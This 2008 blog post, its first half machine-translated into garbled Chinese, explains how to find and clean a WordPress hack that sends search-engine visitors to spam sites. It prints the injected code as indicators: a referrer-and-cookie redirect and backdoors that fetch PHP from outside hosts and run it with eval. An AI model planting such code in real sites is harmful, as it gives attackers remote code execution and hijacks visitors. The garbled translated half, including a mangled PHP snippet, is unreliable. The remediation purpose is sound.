WordPress文丐： 恢復并且固定Google和搜索引擎或者沒有曲奇餅交通被改方向對Your-Needs.info、AnyResults.Net、Golden-Info.net和其他非法站點

黑客全力以赴亂砍，并且利用在網被主持的WordPress blogs，種植和注射惡意代碼入WordPress代碼和數據庫為了改訪客和命中方向從Google和其他搜尋引擎發送同樣的消息到多個新聞組站點例如your-needs.info， anyresults.net， golden-info.net， keymachine.de， beliy.us， seogoogle.us，并且填裝用的許多其他發送同樣的消息到多個新聞組站點支付每點擊CPC ads。 某一文丐看上去通過改全部方向瞄準更大的人群，不用WordPress曲奇餅。 不用被亂砍，這些交易假想到達在blog作為目的地。

搜索引擎改變方向文丐的症狀

注意不是所有的症狀也許一共發生。 文丐一個方法存在了也許有超過，對另外發現和可能的決議貢獻。

• 通過所有點擊從查尋引擎例如Google，雅虎， AOL， MSN，窗口居住查尋結果，包括blog名字，被改方向并且批轉對黑客的站點例如your-needs.info， anyresults.net， golden-info.net， keymachine.de， beliy.us， seogoogle.us，與名單肯定增長。 觀察者到達在黑客頁與他或她在搜索引擎曾經搜尋的同一個搜索字符串。
• 點擊鏈接對blog在RSS飼料讀者例如Google讀者能也是被改方向對黑客站點。
• 一個沒有訪客沒有帳戶在blog或者註冊(因此不食用惡意代碼查出的曲奇餅)，不會被改方向發送同樣的消息到多個新聞組站點。
• 仅參觀從搜索引擎被改方向，并且把戲設法無所事事大概很多bloggers、Web站點管理員和站點所有者或者至少延遲問題的偵查。
• 突然的巨大和劇烈的下落和在網跟蹤儀統計，特別是交通丟失大數量訪客交易并且呼叫看法與Google作為referrer，即使搜索引擎結果排列是原封的。
• 廣告收入Massic下落從Google AdSense或其他ads網絡或者會員委員會。
• 以下base64編碼PHP代碼在wpblog header.php文件也許出現：

  <？php \
$seref=array (「google」， 「msn」， 「活」， 「AltaVista」， 「要求」， 「雅虎」， 「AOL」， 「cnn」， 「天氣」， 「alexa」);
$ser=0; foreach ($seref作為$ref)，如果(strpos (strtolower ($_SERVER [』 HTTP_REFERER』])， $ref)! ==false) {$ser=」 1 ？; 斷裂; }
如果($ser==」 1 ？ && sizeof ($_COOKIE) ==0) {倒栽跳水(」地點： http://」 .base64_decode (」 YW55cmVzdWx0cy5uZXQ=」)。」/」); 出口; } ？>

• 圖像，實際上是一束惡意PHP代碼，增加了到wp內容或上裝目錄。 例如， wp內容或uploads/2008/06/06/abcdefghijklmn.jpg或者它也許是在您的題材文件夾裡面，即。 wp內容或題材或者經典之作或者圖像或者xyz.jpg。 The name of the image may be in the format of xxxxxx_old.jpeg.
• An entry was inserted in MySQL database for WordPress wp_options to activate the image (the malicious PHP code) as a plugin, typically as rss_f541b3abd05e7962fcab37737f40fad8.
• There may be also malicious codes, especially those that interpreted with eval() or base64_decode() command been inserted into other WordPress PHP files. Examples are the following codes:

  if(isset($_GET['p'])) {
$sock = @fsockopen(’km20725.keymachine.de’, 80);
if($sock){
fwrite ($sock, ‘GET http://km20725.keymachine.de/server/index.php?host=’.$_SERVER['SERVER_NAME'].’&p=’.$_GET['p'].’ HTTP/1.0′.”\r\n”);
fwrite ($sock, ‘Host: km20725.keymachine.de’.”\r\n\r\n”);
while($content[] = fgets ($sock));
$content = implode(”, $content);
@eval(trim(substr($content, strpos($content, “\r\n\r\n”))));
fclose ($sock);}
}

  if(isset($_GET['p'])) { @eval(@file_get_contents(’http://beliy.us/server/index.php?host=’.$_SERVER['SERVER_NAME'].’&p=’.$_GET['p']));
}

  if(isset($_GET['p'])) { @eval(@file_get_contents(’http://seogoogle.us/server/index.php?host=’.$_SERVER['SERVER_NAME'].’&p=’.$_GET['p']));
}

  eval(gzinflate(base64_decode(

• WordPress theme that is been activated and used can be injected with hacking code and affected too. Such code normally exists in header.php or index.php of the theme, and has a line similar to the below

  if($ser==”1″ && sizeof($_COOKIE)==0){ header(”Location:

The WordPress search traffic redirect to spam site hack happens probably due to security hole and vulnerability that is not patched when blog owner decides not to upgrade to latest version of WordPress (although some reports that their blogs been hacked even though it’s already on the latest version of WordPress 2.5.1). Whatever the cause, here’s the fix and solution to resolve and defeat the hack to ensure that you own back the traffic and avoid been penalized by Google by unreasonable redirecting to spam pages.

1. Backup the WordPress database.
2. Use phpMyAdmin to browse WordPress MySQL database tables. Go to wp_options table, and then edit the row named active_plugins. The row details all active plugins that has been activated. Go through the list (in a line), and look for an a plugin named ended with an image extension, such as .jpg, .jpeg, .gif and etc. For example, abcdefgh_old.jpeg. Note down the path to the image file.
3. Using sFTP or SSH (forget about FTP or Telnet for security), then navigate to the path of the file, and delete the file.
4. Go to WordPress Administrator Plugins panel, deactivate or activate any plugin to clear off the malicious plugin from the “active_plugins” row.
5. Back to phpMyAdmin, at the wp_options table, find a row that contains the following string as option_name:

   rss_f541b3abd05e7962fcab37737f40fad8

   Delete the row away.

   If you don’t know how to perform the database cleanup detailed in steps above, here’s a video tutorial:

6. Go to wp_users table. If there is a nameless user (null value in user_nicename field) created at 00:00:00 on 0000-00-00, note down the user ID (ID field, a number). Delete the user.
7. Browse the wp_usermeta table. Locate all rows with user_id matches the ID of the deleted illegal user. There are normally three rows been associated to the invader user ID. Delete all the associated rows.
8. Login to the server to edit the theme files, or browse the theme files’ code in Theme Editor of WordPress Administrator Design panel. Check the header.php and index.php for any suspicious code. As mentioned above, look for something similar to the line below:

   if($ser==”1″ && sizeof($_COOKIE)==0){ header(”Location:

   If found, delete and remove the code. Note that the malicious code will be several lines long in total.

9. If it’s not already existed, create an empty index.html file in the wp-contents/plugins directory. The blank index.html hides the contents of the plugins directory, effectively shield what plug-ins been used from hackers to harden and tighten the WordPress security.
10. Upload and replace each and every WordPress files (not only wp-blog-header.php) on the server with the fresh, clean, and original latest version from WordPress (of course, except few files such as wp-config.php and themes). If you’re upgrading, read the guide carefully.
11. Change your password.
12. If you have multiple users, change theirs password (or ask them to change the password) too.

IMPORTANT: This is a machine translated page which is provided "as is" without warranty. Machine translation may be difficult to understand. Please refer to original English article whenever possible.

Share and contribute or get technical support and help at My Digital Life Forums.

Related Articles

• Add NoFollow Relationship to WordPress Blogroll to Increase PageRank
• WordPress Plugin: Display Google Analytics and FeedBurner Reports Statistics from Site Admin
• Technorati Incoming Links Plugin for WordPress
• A Glance At Google Merchant Search
• How to Avoid, Bypass or Escape Google Sandbox
• Ask.com Search Engine Review by CNNMoney
• Drive More Traffic by Using Images
• SEO Friendly Rewrite Method to Move Website URL From Subdirectory to Root Parent Folder
• Integrate and Display Google AdSense for Search and Co-Op Custom Search Engine Results in WordPress Blog Page Template
• Which Search Engine is the Best and Most Relevant?

This entry was posted on Tuesday, June 10th, 2008 at 1:03 am and is filed under Weblogs. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.